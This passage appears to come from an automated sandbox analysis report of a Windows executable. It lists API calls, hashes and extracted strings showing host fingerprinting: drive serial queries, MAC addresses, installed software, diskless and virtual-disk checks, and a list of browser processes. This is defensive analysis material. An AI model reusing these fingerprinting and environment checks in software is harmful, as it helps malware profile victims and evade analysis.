                                                                                                                                                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                          • API String ID: 4026078076-2935326385
                                                                                                                                                                                                          • Opcode ID: 26a109bb306a2b735817eb4d63b2e072ca32aac009c5cafa4deea32d63d42775
                                                                                                                                                                                                          • Instruction ID: 49810f156e84413fbb9d0ae973cc4d75f0afff07210655de5e1847eb7a514f9e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26a109bb306a2b735817eb4d63b2e072ca32aac009c5cafa4deea32d63d42775
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B051537594021C6BEB20EB90DC45FDEB77CAB54704F1041E7E609A61C2EB74AB88CFA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F410
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F459
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0007C088,00000200,00000020,?,00000210,00000000,00000000), ref: 0048F50A
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F17B
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F18A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0048F5B7
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_contextControlDevice$CloseCreateFileHandle
                                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                          • API String ID: 1965763561-2935326385
                                                                                                                                                                                                          • Opcode ID: 2cf4ba7a51fadd37345ffbb9f5bf5e04af343b3b7879102c1c8590a62626aa70
                                                                                                                                                                                                          • Instruction ID: d93b69fd839a378a64cbd2de74eac878bc54bf4f98035448b354ecb699a6860c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf4ba7a51fadd37345ffbb9f5bf5e04af343b3b7879102c1c8590a62626aa70
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5182B1D8021CAAEB20DB149C86BDDB778AF55704F4045E9A608671C3EA742BC9CF5D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,04071060), ref: 0046D1E9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046D20D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: .dll$pi32$rasa
                                                                                                                                                                                                          • API String ID: 2574300362-1171601560
                                                                                                                                                                                                          • Opcode ID: 282e85a8e29a636c75e80827ee9ef6189721a69257591488fed5861b08c5999c
                                                                                                                                                                                                          • Instruction ID: 8ba69286e2875fa04e2028cc30cfcc9fecd9a4cef30ff8113009bae58c8e748d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 282e85a8e29a636c75e80827ee9ef6189721a69257591488fed5861b08c5999c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 041179B0C04209DFDB00CF98E9457AEFBF8FB08704F10861EE815A3250EB74AA04CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlInitializeCriticalSection.NTDLL(00597C34), ref: 00414BAE
                                                                                                                                                                                                            • Part of subcall function 00414B40: __Init_thread_footer.LIBCMT ref: 00414BCA
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlEnterCriticalSection.NTDLL(00597C34), ref: 00414BE5
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlLeaveCriticalSection.NTDLL(00597C34), ref: 00414C39
                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,00002880), ref: 004672FE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 00467392
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AdaptersEnterInfoInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: %02X-%02X-%02X-%02X-%02X-%02X
                                                                                                                                                                                                          • API String ID: 3854266947-960560484
                                                                                                                                                                                                          • Opcode ID: 9e23a888994caeda64439ce0ad4aabf21f5f9e37cad4cdececbd54cfffda7eff
                                                                                                                                                                                                          • Instruction ID: 27a56018961e61ea3aa1aafbc4271de6f5053c71d0accbddf7e508503ec92722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e23a888994caeda64439ce0ad4aabf21f5f9e37cad4cdececbd54cfffda7eff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5613C71A042549FDB31CF64CC59BDABBB4AF05314F0441CAE55997682EF38AAC4CB52

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EE44
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EEC2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EF05
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$EnterInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: &inf=$.NET Framework$DisplayName$Key$Publisher$P}A$RegC$RegE$RegO$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$StrS$appid$avlt$avs$bclk$cid$ckw$clr$cont$conw$ddr$dlr$etrc$etrc2$eyEx$eyEx$fre$frr$gqp$kspdf$kspic$kszip$lbc$lbcr$lose$mbp$md5$mdo$microsoft$mio$mnri$numK$p1t$p2t$p3t$p4t$penK$pgid$pgtp$round$sbclk$sftck$sftk$sid$sk2id$skid$slg$trIW$trIW$tskid$uid$zid
                                                                                                                                                                                                          • API String ID: 1294845845-3276813324
                                                                                                                                                                                                          • Opcode ID: 298135c10aa60212f5c364afa4904734bb7c0ad070eef5cc20314be292253638
                                                                                                                                                                                                          • Instruction ID: 42cb36eda225d88379692d1e440af2bd53be63478b1ccf7c2c8711e0ac85645b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298135c10aa60212f5c364afa4904734bb7c0ad070eef5cc20314be292253638
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54C2B230911258EEDF14EBA5DD45BEEBBB4BF10308F40819EE049A3191EB786B48DF95

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
                                                                                                                                                                                                            • Part of subcall function 004552D0: __Init_thread_footer.LIBCMT ref: 0045536E
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlEnterCriticalSection.NTDLL ref: 00455389
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004698A2
                                                                                                                                                                                                          • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,0000000E,00000000,00000020,7591F550), ref: 004698B2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469907
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046997D
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000007,00000000,?,000007FE,00000000), ref: 004699A4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469A07
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,00000000,?,000007FE,00000000), ref: 00469A2E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469A8B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00469ACE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B11
                                                                                                                                                                                                          • StrStrIA.SHLWAPI(?,richdisk), ref: 00469B25
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B54
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B97
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469BDA
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469C1D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469C60
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469CA3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469CE6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469D2E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469E82
                                                                                                                                                                                                          • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00469E90
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Setup$Device$EnterInit_thread_footerInitializeLeavePropertyRegistry$ClassDestroyDevsInfoList
                                                                                                                                                                                                          • String ID: A$Info$List$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$bxp scsi$ccboot$deepin$evsW$hangzhou changjin$mzd.live$nmenu$nxd xp$richdisk$ter$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$vdiskbus$vhd cms$vice$vnd scsi
                                                                                                                                                                                                          • API String ID: 2279208414-2458627454
                                                                                                                                                                                                          • Opcode ID: a345448e2b9446b60aeca82d63a069c040a82c70df20a837f092cf8f5c6a21b0
                                                                                                                                                                                                          • Instruction ID: 46e34079cb28ee3dac007b19e727f48e6ac5ef881adbdfc1ca7c33a713eff10d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a345448e2b9446b60aeca82d63a069c040a82c70df20a837f092cf8f5c6a21b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF12427091025A9FDB10DF64DD41BA9BBF8BF19304F00819AE45CE7251EBB4AE85CFA1

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0041052C
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00410539
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00410546
                                                                                                                                                                                                            • Part of subcall function 00410800: GetProcAddress.KERNEL32 ref: 00410886
                                                                                                                                                                                                            • Part of subcall function 00410800: GetProcAddress.KERNEL32(?,?), ref: 004108D9
                                                                                                                                                                                                            • Part of subcall function 00410800: SHGetPathFromIDListW.SHELL32(?,?,?,?), ref: 004108EE
                                                                                                                                                                                                            • Part of subcall function 00410800: FindFirstFileW.KERNEL32(?,?), ref: 00410961
                                                                                                                                                                                                            • Part of subcall function 00410800: CoInitialize.OLE32(00000000), ref: 004109E9
                                                                                                                                                                                                            • Part of subcall function 00410800: CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00410A18
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,SLBrowser.exe,00000000,?,?), ref: 0041061D
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0041063D
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 00410647
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,UJNGRFSBFJWOKS,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410664
                                                                                                                                                                                                            • Part of subcall function 00481F30: GetClientRect.USER32(00000000), ref: 00481F69
                                                                                                                                                                                                          • SetTimer.USER32(00000000,00007E43,00001770,00000000), ref: 0041070E
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?), ref: 00410764
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0041076B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateSimpleString::operator=$AddressEventHandleModuleProc$ClassClientFileFindFirstFromInitializeInstanceListPathRectRegisterTimerWindow
                                                                                                                                                                                                          • String ID: 2345Explorer.exe$360chrome.exe$360se.exe$Maxthon010203.11exe$MxStart010203.11exe$Opera\launcher010203.11exe$QQBrowser.exe$SLBrowser.exe$Tango3010203.11exe$TaoBrowser010203.11exe$TheWorld010203.11exe$UCBrowser.exe$UJNGRFSBFJWOKS$baiduBrowser010203.11exe$chrome.exe$dge.$exe$firefox.exe$iexp$liebao010203.11exe$lore.$mse$qianying010203.11exe$shortcut$sogouexplorer.exe
                                                                                                                                                                                                          • API String ID: 4163093286-2938698853
                                                                                                                                                                                                          • Opcode ID: 40b20a862301f5aea954fdb987e9bbb8bda5afa14a7635b0de9bb88c0959dd8d
                                                                                                                                                                                                          • Instruction ID: 23ebb9a8916a565e2745ce6d40a011bcf8e2e70713e5ae40f8ab8740941a9c4c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40b20a862301f5aea954fdb987e9bbb8bda5afa14a7635b0de9bb88c0959dd8d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85A27E70D05358DAEB20DF64C945BDEBBB0BF51308F10869ED049BB292DB786A84CF55
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059699C), ref: 0049A59C
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059699C), ref: 0049A5F0
                                                                                                                                                                                                          • GetCapture.USER32 ref: 0049A60E
                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?,?,EFE0703F,?,?), ref: 0049A72C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0049AA29
                                                                                                                                                                                                          • BeginPaint.USER32(?,?,EFE0703F,?,?), ref: 0049ACF9
                                                                                                                                                                                                          • EndPaint.USER32(?,?,00000000,?,?), ref: 0049AD0F
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0049ADAF
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0049ADB6
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0049ADF3
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0049ADFA
                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0049AE2F
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000112,?,?), ref: 0049AE71
                                                                                                                                                                                                          • 73A0A570.USER32(?,?,?), ref: 0049AEE7
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0049AF35
                                                                                                                                                                                                          • RemovePropW.USER32(?,SYSPLUGIN), ref: 0049AF62
                                                                                                                                                                                                            • Part of subcall function 00496970: DeleteObject.GDI32(?), ref: 004969AB
                                                                                                                                                                                                            • Part of subcall function 00496970: DeleteObject.GDI32(?), ref: 004969BC
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059699C), ref: 0049B6D3
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0049B6E8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$CriticalSection$DeleteLoadMessageObjectPaintSend$A570BeginCallCaptureClientEnterInit_thread_footerInitializeInvalidateLeaveProcPropRectRemoveScreenWindow
                                                                                                                                                                                                          • String ID: DownLoadFrame_splash$SYSPLUGIN$dulibMenuClass
                                                                                                                                                                                                          • API String ID: 273701605-2935986418
                                                                                                                                                                                                          • Opcode ID: c4c6417015f089dce10c0349ab81e108fad9e456b07fda7e27c49860a080dd04
                                                                                                                                                                                                          • Instruction ID: f084a153acb2df5a4f5caecbd66f76ff173d37e4b7a2dc1f39f52cb0512712aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c6417015f089dce10c0349ab81e108fad9e456b07fda7e27c49860a080dd04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E924130A00215AFDF249F54DD89FAEBBB8FF45304F1401AAE549A7251DB34AD90CF96

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0042350B
                                                                                                                                                                                                          • StrRChrIA.SHLWAPI(?,00000000,0000005F,00000000,00000000,00000000), ref: 00423518
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrR), ref: 00423551
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 004235A7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrR), ref: 004235F3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042365E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004236AE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042370C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00423757
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004237AF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004237FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$EnterInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: %40$%5F$%76$A$A$A$StrI$StrI$StrR$StrR
                                                                                                                                                                                                          • API String ID: 1506207541-333352116
                                                                                                                                                                                                          • Opcode ID: 81b81600f2cb593c77551468dad1d8a4abc8639d2d0a78a0ddebd3a08e9c92ef
                                                                                                                                                                                                          • Instruction ID: 48f97e0e5b0175d9a4ac7cb73ca2d921a8b35f7d8ba6d1705d3cbafb0d7e01cc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81b81600f2cb593c77551468dad1d8a4abc8639d2d0a78a0ddebd3a08e9c92ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DC190B1709311AFC314DF59D980A2BBBF4AF88304F41496EFA59C7350DB78D9048BAA

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0044CFFC
                                                                                                                                                                                                          • SetEvent.KERNEL32(?,EFE0703F), ref: 0044D079
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0044D096
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountEventTextTickWindow
                                                                                                                                                                                                          • String ID: 0$GWPGWPGWPNB$W$btn_openfile$jjjjjjh$jkj$jkj$main_text1$ttj
                                                                                                                                                                                                          • API String ID: 1892856236-1426361691
                                                                                                                                                                                                          • Opcode ID: f5b603520864e1c63cd1a3c1161cdd37d28df692521ced6fbbf9a146783235db
                                                                                                                                                                                                          • Instruction ID: 4db247760b552e3c20b62f4a37da0c28fdf706a323f357a3a0a9242cd321078b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5b603520864e1c63cd1a3c1161cdd37d28df692521ced6fbbf9a146783235db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2302D370A00205ABFF14DF68CD89BAE77B5AF08308F14017BE9059B296DB78DD44DB69

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00499736
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0049974B
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0049979E
                                                                                                                                                                                                          • CreateRectRgn.GDI32(?,?,?,?), ref: 00499881
                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 004998A4
                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004998BD
                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004998EC
                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 004998F5
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004998FC
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00499942
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00499969
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004999C3
